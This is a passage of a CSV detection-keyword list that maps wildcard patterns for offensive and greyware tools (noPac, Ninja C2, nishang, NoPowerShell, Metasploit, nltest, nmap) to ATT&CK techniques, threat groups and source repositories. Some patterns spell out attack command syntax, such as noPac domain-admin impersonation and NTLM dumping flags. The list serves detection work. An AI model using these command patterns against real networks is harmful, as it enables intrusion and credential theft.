- TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*NimSyscallLoader -*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Ninja c2*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*ninjac2*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*nipe.pl *,offensive_tool_keyword,nipe,An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. 
Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.,T1560 - T1573 - T1578,TA0005 - TA0007,N/A,N/A,Data Exfiltration,https://github.com/htrgouvea/nipe,1,0,N/A,N/A,10,1692,315,2023-09-22T12:35:29Z,2015-09-07T18:47:10Z -*nishang.exe*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*nishang.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*nishang.psm1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*NixImports by dr4k0nia*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,0,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*NixImports.csproj*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*NixImports.exe*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*NixImports.git*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*NixImports.sln*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*njpmifchgidinihmijhcfpbdmglecdlb*,greyware_tool_keyword,Trellonet Trellonet,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nlbejmccbhkncgokjcmghpfloaajcffj*,greyware_tool_keyword,Hotspot Shield Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nltest /all_trusts*,greyware_tool_keyword,nltest,enumerate domain trusts with nltest,T1482 - T1018,TA0007,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nltest /dclist*,greyware_tool_keyword,nltest,enumerate domain trusts with nltest,T1482 - T1018,TA0007,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nltest /domain_trusts*,greyware_tool_keyword,nltest,enumerate domain trusts with nltest,T1482 - T1018,TA0007,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*nmake inject_local *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*nmap -*,greyware_tool_keyword,nmap,A very common tool. 
Network host vuln and port detector.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Information Gathering,https://github.com/nmap/nmap,1,0,greyware tool - risks of False positive !,N/A,10,8299,2206,2023-09-29T08:27:35Z,2012-03-09T14:47:43Z -*nmap * --script=*.nse*,greyware_tool_keyword,nmap,check exploit for CVEs with nmap,T1046 - T1065 - T1202 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation Tools,https://nmap.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*nmap -Pn -v -sS -F*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*nmap-*-setup.exe*,greyware_tool_keyword,nmap,When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. 
and potential vulnerabilities in target systems.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*nmap/ncrack*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*nmap_smb_scan_custom_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*nmapAnswerMachine.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*nmap-elasticsearch-nse*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*nmap-reverse-lookup*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,0,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*no Mimik@tz - loaded successfully*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*no_session_payload.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*NoApiUser.exe*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*noclient: failed to execute %s: %s*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*node stealer.js *,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*NoFault\NoFault.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*NoFilter.exe *,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*NoFilter-main.zip*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*nop_shellcode.bin*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*noPac * -dc-ip * --impersonate *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*noPac.* -create-child*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation 
tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -dc-host *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -dc-ip *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -domain-netbios*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -dump*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -hashes *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* --impersonate *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* 
-just-dc-ntlm*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -just-dc-user *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -new-name *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -no-add *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -pwd-last-set*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -service-name *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -shell*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA 
from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -shell-type *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -use-ldap*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.csproj*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*noPac.csproj.AssemblyReference.cache*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*noPac.py*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.sln*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation 
tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*NoPowerShell.cna*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.cna*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.Commands*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.dll*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth 
Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.dll*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*nopowershell.exe*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
